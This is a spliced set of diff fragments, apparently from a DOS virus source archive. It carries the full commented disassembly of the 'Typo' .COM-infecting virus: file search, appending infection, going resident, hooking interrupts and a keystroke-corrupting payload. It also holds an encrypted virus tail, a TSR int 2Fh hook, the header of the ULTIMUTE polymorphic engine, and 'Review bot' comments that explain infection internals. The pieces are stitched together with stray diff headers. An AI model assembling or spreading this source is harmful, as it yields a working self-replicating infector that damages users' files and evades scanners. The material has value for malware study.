db 14h, 0DBh, 71h, 36h, 99h, 95h
|
||||
db 68h, 0B5h, 0F0h, 70h, 30h, 4Ah
|
||||
db 0DCh, 0F4h, 4Bh, 66h, 0E5h, 44h
|
||||
db 82h, 0F0h, 0Fh, 9, 0B5h, 0A6h
|
||||
db 7Fh, 0DCh, 0D6h, 0E4h, 0DAh, 0E6h
|
||||
db 2, 0EEh, 6, 0F6h, 0Bh, 0FEh
|
||||
db 0Eh, 0FEh
|
||||
db 9
|
||||
loc_8:
|
||||
jge loc_6 ; Jump if > or =
|
||||
stosb ; Store al to es:[di]
|
||||
mov al,0B3h
|
||||
mov ch,0Dh
|
||||
mov ax,1D6Dh
|
||||
sbb dh,al
|
||||
cmc ; Complement carry
|
||||
hlt ; Halt processor
|
||||
div al ; al, ah rem = ax/reg
|
||||
jmp short loc_8 ; (04FD)
|
||||
db 0E4h, 12h, 1Fh, 16h, 1Eh, 12h
|
||||
db 11h, 1Eh, 10h, 11h, 1Bh, 15h
|
||||
db 5, 11h, 0FFh, 0EDh, 0F9h, 0F1h
|
||||
db 0E3h, 0F5h, 0EDh, 0F1h, 0E7h, 0FEh
|
||||
db 0E1h, 0F2h, 0E8h, 0F6h, 0EBh, 0F2h
|
||||
db 0F2h, 0EEh, 0CDh, 0D2h, 0F4h, 0D6h
|
||||
db 0F7h, 0D2h, 0FEh, 0DEh, 0F9h, 58h
|
||||
db 9Bh, 3Fh, 5Eh, 95h, 7, 64h
|
||||
db 13h, 72h, 1Ah, 41h, 0F6h, 1Bh
|
||||
db 0DCh, 0FFh, 49h, 0B3h, 4Ch, 1Bh
|
||||
db 0F1h, 78h, 3Bh, 6Eh, 7, 4Eh
|
||||
db 96h, 5Ah, 0B4h, 0Fh, 0CDh, 14h
|
||||
db 0D3h, 7Bh, 1Eh, 0D1h, 7Fh, 18h
|
||||
db 13h, 6Eh, 2, 45h, 0F6h, 1Fh
|
||||
db 0F6h, 0F3h, 0A5h, 62h, 3Eh, 0C2h
|
||||
db 0F0h, 0C6h, 0F8h, 0B3h, 0AAh, 0Dh
|
||||
db 15h, 10h, 61h, 0D7h, 18h, 3Ah
|
||||
db 0DCh, 0DFh, 0F7h, 0FDh, 96h, 98h
|
||||
db 98h, 0D3h, 0BDh, 0AEh, 0B9h, 0BBh
|
||||
db 0C8h, 0B6h, 0B2h, 0B2h, 0AFh, 0D1h
|
||||
db 0BEh, 0BCh, 0B8h, 0F7h, 0F5h, 0BEh
|
||||
db 0EDh, 0EFh, 0EDh, 13h, 14h, 16h
|
||||
db 14h, 12h, 1Ch, 1Eh, 1Ch, 12h
|
||||
db 14h, 16h, 14h, 12h, 0ECh, 0EFh
|
||||
db 0EDh, 0F3h, 0F5h, 0F7h, 0F5h, 0F3h
|
||||
db 0FDh, 0FFh, 0FDh, 0F3h, 0F5h, 0F7h
|
||||
db 0F5h, 0F3h, 0EDh, 0EFh, 0EDh, 0D3h
|
||||
db 0D5h, 0D7h, 0D5h, 0D3h, 0DDh, 0DFh
|
||||
db 0DDh, 0D3h, 0D5h, 0D7h, 0D5h, 0D3h
|
||||
db 0EDh, 0EFh, 0EDh, 0F3h, 0F5h, 0F4h
|
||||
db 0CAh, 0CCh, 0C2h, 0C0h, 0C2h, 0CCh
|
||||
db 0CAh, 0C8h, 0B6h, 0BCh, 0A0h, 0ECh
|
||||
db 0E3h, 93h, 95h, 97h, 29h, 5Fh
|
||||
db 0B6h, 9Fh, 0BDh, 58h, 0Fh, 0Dh
|
||||
db 81h, 97h, 0EDh, 0EFh, 0EDh, 0B2h
|
||||
db 0B2h, 0B6h, 0A7h, 0DDh, 0BEh, 0B0h
|
||||
db 0B0h, 0F3h, 0F5h, 0BAh, 0F5h, 0F3h
|
||||
db 0EDh, 0EFh, 0EDh
|
||||
|
||||
twelve endp
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
end start
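Review bot: Nothing in the header says that everything after the three-byte `db 0E9h, 1, 0` at start is stored encrypted, so the mnemonics the disassembler produced from loc_1 onward (`esc 7,cl`, `int 0BDh`, `hlt`, `call $-4A7Fh`) read as if they were the program logic, when they appear to be a decode of ciphertext. A comment under the `;* jmp $+4h` line such as `; body is stored encrypted: the db lines that follow hold the decryptor and ciphertext, and the instructions listed from loc_1 on are not meaningful until decrypted` would stop a reader from analysing them as code. The header block (Created/Version/Passes/Analysis Options) is disassembler boilerplate and carries no such note. The few bytes right after the jump, which appear to be the decryptor, are the only part worth reading as instructions, yet they are the part left as raw `db` lines rather than disassembled.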
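--- a/PLACEHOLDER_PATH_NOT_ON_PAGE
+++ b/PLACEHOLDER_PATH_NOT_ON_PAGE
@@ -0,0 +1,59 @@
+SEG_A segment byte public
+assume cs:seg_a,ds:seg_a
+org 100h
+
+MULTIPLEXOR proc far
+start:
+jmp BEGIN
+MULTIPLEXOR endp
+
+; Subroutine work on the DOS Int2Fh (Multiplexor)
+; It stay rezident and calling Old Int2Fh, if don't call FnBAh.
+; Functions (ah=BAh): ³ Return:
+; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
+; al=0 ³ al=0ffh, bl=READ_ON
+; al=1 ³ bl=READ_ON=1
+; al=2 ³ bl=READ_ON=0
+; al=3 ³ Calling WRITE; bl=READ_ON=1
+
+ADM proc
+cmp ah,byte ptr cs:ADM_INT
+je ADM_WORK
+db 0eah
+INT2F_JUMP db 0,0,0b2h,89h
+ADM_WORK:
+cmp al,0
+jne ADM_WORK1
+mov al,0ffh
+IRET
+ADM_WORK1:
+push dx
+push ax
+mov dl,al
+mov ah,2
+int 21h
+pop ax
+pop dx
+IRET
+ADM endp
+
+ADM_INT db 93h
+
+REZIDENT:
+BEGIN:
+; Init interrupt vectors
+mov ax,352fh
+int 21h
+mov word ptr cs:INT2F_JUMP,bx
+mov word ptr cs:INT2F_JUMP+2,es
+mov al,2fh
+mov dx,offset ADM
+mov ah,25h
+int 21h
+mov ah,093h
+mov al,'*'
+int 2fh
+mov dx,offset REZIDENT
+int 27h
+SEG_A ends
+end start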
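Review bot: The header table documents an ah=BAh interface with al=0..3 returning READ_ON/WRITE state in bl, but ADM dispatches on `ADM_INT db 93h` and handles only two cases: al=0 returns al=0FFh (the installation check) and any other al is printed as a character through DOS function 02h; bl is never written. The comment should describe what the code does, e.g. `; ah=93h: al=0 -> al=0FFh (installed); al<>0 -> echo al via int 21h/02h; any other ah -> far jump to the saved int 2Fh vector`. Issuing int 21h from inside an int 2Fh handler is unsafe if the multiplex call arrives while DOS is already active, since DOS is not reentrant; the init code gets away with it only because it issues `int 2fh` itself from top level, and a comment stating that the echo function is meant for top-level callers would document that assumption. The `0b2h,89h` segment preset in INT2F_JUMP is overwritten at BEGIN before the vector is hooked, so it is harmless but deserves a `; patched at init from the current int 2Fh vector` comment.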
@ -0,0 +1,433 @@
|
|||
page 65,132
|
||||
title The 'Typo' Virus
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º British Computer Virus Research Centre º
|
||||
; º 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England º
|
||||
; º Telephone: Domestic 0273-26105, International +44-273-26105 º
|
||||
; º º
|
||||
; º The 'Typo' Virus º
|
||||
; º Disassembled by Joe Hirst, October 1989 º
|
||||
; º º
|
||||
; º Copyright (c) Joe Hirst 1989. º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
VECTOR SEGMENT AT 0
|
||||
|
||||
; Interrupt vectors
|
||||
|
||||
ORG 58H
|
||||
BW0058 DW ? ; Interrupt 16H offset
|
||||
BW005A DW ? ; Interrupt 16H segment
|
||||
ORG 80H
|
||||
BW0080 DW ? ; Interrupt 20H offset
|
||||
BW0082 DW ? ; Interrupt 20H segment
|
||||
BW0084 DW ? ; Interrupt 21H offset
|
||||
BW0086 DW ? ; Interrupt 21H segment
|
||||
|
||||
VECTOR ENDS
|
||||
|
||||
RAM SEGMENT AT 400H
|
||||
|
||||
; System data
|
||||
|
||||
ORG 6CH
|
||||
BW046C DW ? ; System clock
|
||||
|
||||
RAM ENDS
|
||||
|
||||
HOST SEGMENT AT 0
|
||||
|
||||
ORG 2CH
|
||||
DW002C DW ?
|
||||
ORG 0D0H
|
||||
DW00D0 EQU THIS WORD
|
||||
DB00D0 DB ?
|
||||
ORG 100H
|
||||
DB0100 DB ?
|
||||
DW0101 DW ?
|
||||
|
||||
HOST ENDS
|
||||
|
||||
CODE SEGMENT BYTE PUBLIC 'CODE'
|
||||
|
||||
ASSUME CS:CODE,DS:HOST
|
||||
|
||||
DB 'V1' ; Signature
|
||||
DB 0E9H, 1, 0 ; Jump for start of host
|
||||
DB '*.COM', 0 ; File spec for infection
|
||||
DB 0CEH, 0CDH, 20H ; File start read buffer
|
||||
DB 'V1' ; Signature test read buffer
|
||||
DW 5 ; File handle
|
||||
DB 0CDH, 20H, 90H ; Start of host
|
||||
DB 0
|
||||
DW 5AH ; Generation count
|
||||
DB 0
|
||||
|
||||
; Entry point
|
||||
|
||||
START: PUSH BX
|
||||
PUSH CX
|
||||
PUSH DX
|
||||
PUSH DS
|
||||
PUSH ES
|
||||
PUSH SI
|
||||
PUSH CS
|
||||
POP DS
|
||||
CALL BP0024 ; \ Get current address
|
||||
BP0024: POP SI ; /
|
||||
SUB SI,24H ; Relocate from start of virus
|
||||
DEC WORD PTR [SI+16H] ; Subtract from generation count
|
||||
CMP WORD PTR [SI+16H],3 ; Is generation count three?
|
||||
JNE BP0036 ; Branch if not
|
||||
MOV WORD PTR [SI+16H],005BH ; Reset generation count to 91
|
||||
BP0036: CALL BP02BE ; Test system for infection
|
||||
MOV DX,00D0H ; Temp default DTA
|
||||
MOV AH,1AH ; Set DTA function
|
||||
INT 21H ; DOS service
|
||||
MOV AL,[SI+0BH] ; \ Save start of host (1)
|
||||
MOV [SI+12H],AL ; /
|
||||
MOV AX,[SI+0CH] ; \ Save start of host (2)
|
||||
MOV [SI+13H],AX ; /
|
||||
MOV AH,2AH ; Get date function
|
||||
INT 21H ; DOS service
|
||||
TEST DL,1 ; First of month?
|
||||
JNZ BP0074 ; Branch if not
|
||||
MOV DX,SI ; \ Address '*.COM'
|
||||
ADD DX,5 ; /
|
||||
nop
|
||||
XOR CX,CX ; No attributes
|
||||
MOV AH,4EH ; Find first file function
|
||||
INT 21H ; DOS service
|
||||
JB BP0074 ; Branch if not found
|
||||
BP0063: CALL BP0092 ; Test for infection
|
||||
MOV DX,SI ; \ Address '*.COM'
|
||||
ADD DX,5 ; /
|
||||
nop
|
||||
XOR CX,CX ; No attributes
|
||||
MOV AH,4FH ; Find next file function
|
||||
INT 21H ; DOS service
|
||||
JNB BP0063 ; Branch if found
|
||||
BP0074: MOV AL,[SI+12H] ; \ Restore start of host (1)
|
||||
MOV DB0100,AL ; /
|
||||
MOV AX,[SI+13H] ; \ Restore start of host (2)
|
||||
MOV DW0101,AX ; /
|
||||
MOV DX,0080H ; Original default DTA
|
||||
MOV AH,1AH ; Set DTA function
|
||||
INT 21H ; DOS service
|
||||
POP SI
|
||||
POP ES
|
||||
POP DS
|
||||
POP DX
|
||||
POP CX
|
||||
POP BX
|
||||
MOV AX,0100H ; \ Branch to start of host
|
||||
JMP AX ; /
|
||||
|
||||
; Test for infection in COM file
|
||||
|
||||
BP0092: MOV AX,4301H ; Set file attributes function
|
||||
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
|
||||
XOR CX,CX ; No attributes
|
||||
INT 21H ; DOS service
|
||||
MOV AX,3D02H ; Open handle (R/W) function
|
||||
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
|
||||
INT 21H ; DOS service
|
||||
JNB BP00A9 ; Branch if no error
|
||||
JMP BP015D ; Return
|
||||
|
||||
BP00A9: MOV [SI+10H],AX ; Save file handle
|
||||
MOV BX,AX ; Move file handle
|
||||
MOV AH,3FH ; Read handle function
|
||||
MOV CX,3 ; Length to read
|
||||
MOV DX,SI ; \ Address start-of-host store
|
||||
ADD DX,000BH ; /
|
||||
nop
|
||||
INT 21H ; DOS service
|
||||
CMP BYTE PTR [SI+0BH],0E9H ; Is it a jump?
|
||||
JNE BP00F1 ; Branch if not
|
||||
MOV DX,[SI+0CH] ; \
|
||||
SUB DX,16H ; /
|
||||
XOR CX,CX ; No high offset
|
||||
MOV AX,4200H ; Move file pointer function
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
INT 21H ; DOS service
|
||||
MOV BX,AX ; Move actual offset (? not used)
|
||||
MOV AH,3FH ; Read handle function
|
||||
MOV CX,2 ; Length to read
|
||||
MOV DX,SI ; \ Address signature test buffer
|
||||
ADD DX,000EH ; /
|
||||
nop
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
INT 21H ; DOS service
|
||||
JB BP014A ; Branch if error
|
||||
CMP AX,0 ; Did we read anything?
|
||||
JE BP00F1 ; Branch if not
|
||||
MOV AX,[SI+0EH] ; Get signature test
|
||||
CMP AX,[SI] ; Is it signature?
|
||||
JE BP014A ; Branch if yes
|
||||
BP00F1: XOR CX,CX ; \ No offset
|
||||
XOR DX,DX ; /
|
||||
MOV AX,4202H ; Move file pointer function (EOF)
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
INT 21H ; DOS service
|
||||
JB BP014A ; Branch if error
|
||||
SUB AX,3 ; Convert length to jump offset
|
||||
MOV [SI+3],AX ; Store in jump
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
MOV AH,40H ; Write handle function
|
||||
MOV CX,OFFSET ENDADR ; Length of virus
|
||||
NOP
|
||||
MOV DX,SI ; \ Address start of virus
|
||||
ADD DX,0 ; /
|
||||
nop
|
||||
INT 21H ; DOS service
|
||||
JB BP014A ; Branch if error
|
||||
ADD WORD PTR [SI+3],19H ; Add entry point offset to jump offset
|
||||
XOR DX,DX ; \ No offset
|
||||
XOR CX,CX ; /
|
||||
MOV AX,4200H ; Move file pointer function
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
INT 21H ; DOS service
|
||||
JB BP014A ; Branch if error
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
MOV AH,40H ; Write handle function
|
||||
MOV CX,3 ; Length of jump
|
||||
MOV DX,SI ; \ Address initial jump
|
||||
ADD DX,2 ; /
|
||||
nop
|
||||
INT 21H ; DOS service
|
||||
MOV AX,5701H ; Set file date & time function
|
||||
MOV BX,[SI+10H] ; Get file handle
|
||||
MOV CX,DW00D0+16H ; Get file time from DTA
|
||||
MOV DX,DW00D0+18H ; Get file date from DTA
|
||||
INT 21H ; DOS service
|
||||
BP014A: MOV BX,[SI+10H] ; Get file handle
|
||||
MOV AH,3EH ; Close handle function
|
||||
INT 21H ; DOS service
|
||||
MOV AX,4301H ; Set file attributes function
|
||||
MOV DX,OFFSET DB00D0+1EH ; Address file path in DTA
|
||||
MOV CL,DB00D0+15H ; Get attributes from DTA
|
||||
INT 21H ; DOS service
|
||||
BP015D: RET
|
||||
|
||||
; Interrupt 16H routine
|
||||
|
||||
BP015E: STI
|
||||
CMP AH,0DDH ; Infection test function?
|
||||
JNE BP0167 ; Branch if not
|
||||
MOV AL,AH ; Copy function number
|
||||
IRET
|
||||
|
||||
BP0167: CMP AH,0 ; Get key token?
|
||||
JE BP01D8 ; Branch if yes
|
||||
DB 0EAH ; Far jump
|
||||
DW016D DW 0488H ; Int 16H offset
|
||||
DW016F DW 39D8H ; Int 16H segment
|
||||
|
||||
DW0171 DW 0FA76H
|
||||
DW0173 DW 0F9DCH
|
||||
DW0175 DW 005AH
|
||||
|
||||
DB0177 DB 060H, 031H, 032H, 033H, 034H, 035H, 036H, 037H
|
||||
DB 038H, 039H, 030H, 02DH, 03DH, 05CH, 07EH, 021H
|
||||
DB 040H, 023H, 024H, 025H, 05EH, 026H, 02AH, 028H
|
||||
DB 029H, 05FH, 02BH, 07CH, 071H, 077H, 065H, 072H
|
||||
DB 074H, 079H, 075H, 069H, 06FH, 070H, 05BH, 05DH
|
||||
DB 05BH, 061H, 073H, 064H, 066H, 067H, 068H, 06AH
|
||||
DB 06BH, 06CH, 03BH, 027H, 07AH, 078H, 063H, 076H
|
||||
DB 062H, 06EH, 06DH, 02CH, 02EH, 02FH, 051H, 057H
|
||||
DB 045H, 052H, 054H, 059H, 055H, 049H, 04FH, 050H
|
||||
DB 07BH, 07DH, 041H, 053H, 044H, 046H, 047H, 048H
|
||||
DB 04AH, 04BH, 04CH, 03AH, 022H, 03BH, 05AH, 058H
|
||||
DB 043H, 056H, 042H, 04EH, 04DH, 03CH, 03EH, 03FH
|
||||
DB 02EH
|
||||
|
||||
BP01D8: PUSH SI
|
||||
CALL BP01DC ; \ Get current address
|
||||
BP01DC: POP SI ; /
|
||||
PUSHF
|
||||
CALL DWORD PTR CS:[SI-6FH] ; Execute original BIOS call
|
||||
PUSH BX
|
||||
PUSH ES
|
||||
MOV BX,0040H ; \ Address system RAM
|
||||
MOV ES,BX ; /
|
||||
ASSUME ES:RAM
|
||||
MOV BX,BW046C ; Get system clock, low word
|
||||
PUSH BX
|
||||
SUB BX,CS:[SI-6BH] ; DW0171
|
||||
CMP BX,2
|
||||
POP BX
|
||||
MOV CS:[SI-6BH],BX
|
||||
JG BP0236
|
||||
XCHG BX,CS:[SI-69H] ; DW0173
|
||||
SUB BX,CS:[SI-69H]
|
||||
NEG BX
|
||||
CMP BX,CS:[SI-67H] ; DW0175
|
||||
JL BP0236
|
||||
DEC WORD PTR CS:[SI-67H]
|
||||
CMP WORD PTR CS:[SI-67H],6
|
||||
JE BP021E
|
||||
MOV WORD PTR CS:[SI-67H],005BH
|
||||
BP021E: SUB SI,65H
|
||||
PUSH CX
|
||||
MOV CX,0061H
|
||||
BP0225: CMP AL,CS:[SI]
|
||||
JE BP0231
|
||||
INC SI
|
||||
LOOP BP0225
|
||||
POP CX
|
||||
JMP BP0236
|
||||
|
||||
BP0231: POP CX
|
||||
MOV AL,CS:[SI+1]
|
||||
BP0236: POP ES
|
||||
POP BX
|
||||
POP SI
|
||||
RETF 2
|
||||
|
||||
; Interrupt 21H routine
|
||||
|
||||
ASSUME ES:NOTHING
|
||||
BP023C: CMP AH,0 ; Terminate program?
|
||||
JE BP0246 ; Branch if yes
|
||||
CMP AH,4CH ; Load?
|
||||
JNE BP025F ; Branch if not
|
||||
BP0246: CALL BP026D ; Install virus in memory
|
||||
MOV DX,CS:DW002C ; \ Set ES to environment block
|
||||
MOV ES,DX ; /
|
||||
MOV BX,0 ; Zero length
|
||||
MOV AH,4AH ; Set block function
|
||||
INT 21H ; DOS service
|
||||
MOV DX,001DH ; \ Length to keep
|
||||
ADD DX,1 ; /
|
||||
MOV AH,31H ; Keep process function
|
||||
BP025F: DB 0EAH ; Far jump
|
||||
DW0260 DW 2DEAH ; Int 21H offset
|
||||
DW0262 DW 4242H ; Int 21H segment
|
||||
|
||||
; Interrupt 20H routine
|
||||
|
||||
BP0264: MOV AX,4C00H ; Fake a load
|
||||
JMP BP023C ; Process as a DOS service
|
||||
|
||||
DW0269 DW 2C08H ; Int 20H offset
|
||||
DW026B DW 4242H ; Int 20H segment
|
||||
|
||||
; Install virus in memory
|
||||
|
||||
BP026D: PUSH CX
|
||||
PUSH DI
|
||||
PUSH SI
|
||||
PUSH ES
|
||||
CALL BP0274 ; \ Get current address
|
||||
BP0274: POP SI ; /
|
||||
PUSH SI
|
||||
MOV DI,0100H ; Address start of area
|
||||
MOV CX,OFFSET BP023C-BP015E ; Length to copy
|
||||
BP027C: MOV AL,CS:[SI+OFFSET BP015E-BP0274] ; Get a byte
|
||||
MOV CS:[DI],AL ; Store in new location
|
||||
INC SI ; Next input position
|
||||
INC DI ; Next output position
|
||||
LOOP BP027C ; Repeat to end of area
|
||||
POP SI
|
||||
XOR CX,CX ; \ Address zero
|
||||
MOV ES,CX ; /
|
||||
ASSUME ES:VECTOR
|
||||
MOV CX,CS:[SI-14H] ; \ Restore Int 21H offset
|
||||
MOV BW0084,CX ; /
|
||||
MOV CX,CS:[SI-12H] ; \ Restore Int 21H segment
|
||||
MOV BW0086,CX ; /
|
||||
MOV CX,CS:[SI-0BH] ; \ Restore Int 20H offset
|
||||
MOV BW0080,CX ; /
|
||||
MOV CX,CS:[SI-9] ; \ Restore Int 20H segment
|
||||
MOV BW0082,CX ; /
|
||||
MOV CX,0100H ; \ Install moved area as Int 16H
|
||||
MOV BW0058,CX ; /
|
||||
ASSUME ES:NOTHING
|
||||
POP ES
|
||||
POP SI
|
||||
POP DI
|
||||
POP CX
|
||||
RET
|
||||
|
||||
; Test system for infection
|
||||
|
||||
BP02BE: PUSH AX
|
||||
XOR AL,AL ; Clear register
|
||||
MOV AH,0DDH ; Infection test function
|
||||
INT 16H ; Keyboard I/O
|
||||
CMP AL,AH ; Are they the same
|
||||
JNE BP02CB ; Branch if not
|
||||
POP AX
|
||||
RET
|
||||
|
||||
; Install interrupts
|
||||
|
||||
BP02CB: PUSH BX
|
||||
PUSH SI
|
||||
PUSH ES
|
||||
MOV DX,[SI+16H] ; Get generation count
|
||||
CALL BP02D4 ; \ Get current address
|
||||
BP02D4: POP SI ; /
|
||||
PUSH BX
|
||||
PUSH ES
|
||||
MOV BX,0040H ; \ Address system RAM
|
||||
MOV ES,BX ; /
|
||||
ASSUME ES:RAM
|
||||
MOV BX,BW046C ; Get system clock, low word
|
||||
MOV CS:[SI+DW0171-BP02D4],BX ; Get system clock, low word
|
||||
MOV CS:[SI+DW0173-BP02D4],BX ; Get system clock, low word
|
||||
ASSUME ES:NOTHING
|
||||
POP ES
|
||||
POP BX
|
||||
MOV [SI+DW0175-BP02D4],DX ; Save generation count
|
||||
XOR AX,AX ; \ Address zero
|
||||
MOV ES,AX ; /
|
||||
ASSUME ES:VECTOR
|
||||
MOV AX,BW0084 ; \ Save Int 21H offset (DW0260)
|
||||
MOV CS:[SI-74H],AX ;
|
||||
MOV AX,BW0086 ; \ Save Int 21H segment (DW0262)
|
||||
MOV CS:[SI-72H],AX ;
|
||||
MOV AX,BW0058 ; \ Save Int 16H offset (DW016D)
|
||||
MOV CS:[SI+0FE99H],AX ; /
|
||||
MOV AX,BW005A ; \ Save Int 16H segment (DW016F)
|
||||
MOV CS:[SI+0FE9BH],AX ; /
|
||||
MOV AX,BW0080 ; \ Save Int 20H offset (DW0269)
|
||||
MOV CS:[SI-6BH],AX ; /
|
||||
MOV AX,BW0082 ; \ Save Int 20H segment (DW026B)
|
||||
MOV CS:[SI-69H],AX ; /
|
||||
CLI
|
||||
PUSH CS ; \ Set Int 21H segment
|
||||
POP BW0086 ; /
|
||||
MOV BW0084,SI ; \ Set Int 21H offset (BP023C)
|
||||
SUB BW0084,0098H ; /
|
||||
PUSH CS ; \ Set Int 20H segment
|
||||
POP BW0082 ; /
|
||||
MOV BW0080,SI ; \ Set Int 20H offset (BP0264)
|
||||
SUB BW0080,70H ; /
|
||||
PUSH CS ; \ Set Int 16H segment
|
||||
POP BW005A ; /
|
||||
MOV BW0058,SI ; \ Set Int 16H offset (BP015E)
|
||||
SUB BW0058,0176H ; /
|
||||
STI
|
||||
ASSUME ES:NOTHING
|
||||
POP ES
|
||||
POP SI
|
||||
POP BX
|
||||
POP AX
|
||||
RET
|
||||
|
||||
ENDADR EQU $
|
||||
|
||||
CODE ENDS
|
||||
|
||||
END
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
|
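Review bot: The comment on the second compare in the Interrupt 21H routine is wrong: `CMP AH,4CH ; Load?` tests DOS function 4Ch, which is terminate-with-return-code (EXEC/load is 4Bh), and the routine's purpose is to go resident as the host terminates, so it should read `CMP AH,4CH ; Terminate with return code?`, and the `MOV AX,4C00H ; Fake a load` at BP0264 should likewise say "fake a terminate". In BP0092 the host length taken from AX after the AX=4202H seek is used unchecked — the DX high word is ignored and nothing compares length plus virus size against the 64K .COM limit — so an oversized .COM is corrupted rather than skipped, which is worth a note for anyone using this listing to characterise the infector. A comment at BP0246 would also help: the AH=4AH call with BX=0 releases the host's environment block, and AH=31H keeps 1Eh paragraphs, i.e. the PSP plus the INT 16H handler that BP026D copied to offset 100H, which is how the resident component ends up at PSP:0100.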
@ -0,0 +1,584 @@
|
|||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; The ULTImate MUTation Engine .93á (c) 1993 Black Wolf Enterprises
|
||||
; pardon the title, had to think of something... }-)
|
||||
;
|
||||
;ULTIMUTE is a mutation engine written for security-type applications and
|
||||
;other areas where mutation of executable code is necessary. For my personal
|
||||
;use, I have implemented it in Black Wolf's File Protection Utilities 2.1s,
|
||||
;using it to encrypt the code placed onto EXE's and COM's to protect them
|
||||
;from simple modification and/or unauthorized use. The encryption algorithms
|
||||
;themselves are terribly simple - the main point being that they change
|
||||
;each time and are difficult to trace through. This engine is written mainly
|
||||
;to keep a "hack one, hack 'em all" approach from working on protected code,
|
||||
;rather than to keep the code secure by a cryptologist's point of view.
|
||||
;
|
||||
;Including: Better Anti-Tracing abilities, 1017 byte size, Anti-Disassembling
|
||||
; code, largely variable size for decoder. Also includes variable
|
||||
; calling segmentation (i.e. CS<>ES<>DS, and can be called via
|
||||
; near call, far call, or interrupt, the last of which can be
|
||||
; useful as a memory-resident handler for multiple programs to
|
||||
; use).
|
||||
;
|
||||
;Note: Please - this program and it's source have been released as freeware,
|
||||
; but do NOT use the mutation engine in viruses! For one thing, the
|
||||
; decryptor sequence has several repetitive sequences that can be scanned
|
||||
; for, and for another, that just isn't what it was designed for and
|
||||
; I would NOT appreciate it. If you MUST use someone else's mutation
|
||||
; engine for such, use the TPE or MTE. I do NOT condone such, however.
|
||||
;
|
||||
;Any modifications made to this program should be listed below the solid line,
|
||||
;along with the name of the programmer and the date the file was changed.
|
||||
;Also - they should be commented where changed. If at all possible, report
|
||||
;modifications to file to the address listed in the documentation.
|
||||
;
|
||||
;DISCLAIMER: The author takes ABSOLUTELY NO RESPONSIBILITY for any damages
|
||||
;resulting from the use/misuse of this program. The user agrees to hold
|
||||
;the author harmless for any consequences that may occur directly or
|
||||
;indirectly from the use of this program by utilizing this program/file
|
||||
;in any manner. Please use the engine with care.
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
;Modifications:
|
||||
; None as of yet (original release version)
|
||||
|
||||
.model tiny
|
||||
.radix 16
|
||||
.code
|
||||
|
||||
public _ULTMUTE, _END_ULTMUTE, Get_Rand, Init_Rand
|
||||
|
||||
;Underscores are used so that these routines can be called from C and other
|
||||
;upper level languages. If you wish to use Get_Rand and Init_Rand in C, you
|
||||
;need to add underscores in their names as well. Also, the random number
|
||||
;generations may not be sound for all purposes. They do the job for this
|
||||
;program, but they may/may not be mathematically correct.
|
||||
|
||||
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
;ENTRY:
|
||||
; CX=Code Length BX=New_Entry_Point
|
||||
; DS:SI=Code AX=Calling Style
|
||||
; ES:DI=Destination 1=Near Call, 2=Far Call, 3=Int Call
|
||||
;
|
||||
;RETURN:
|
||||
; CX=New Size ES:DI = Same, now contains encrypted code
|
||||
; w/decryptor
|
||||
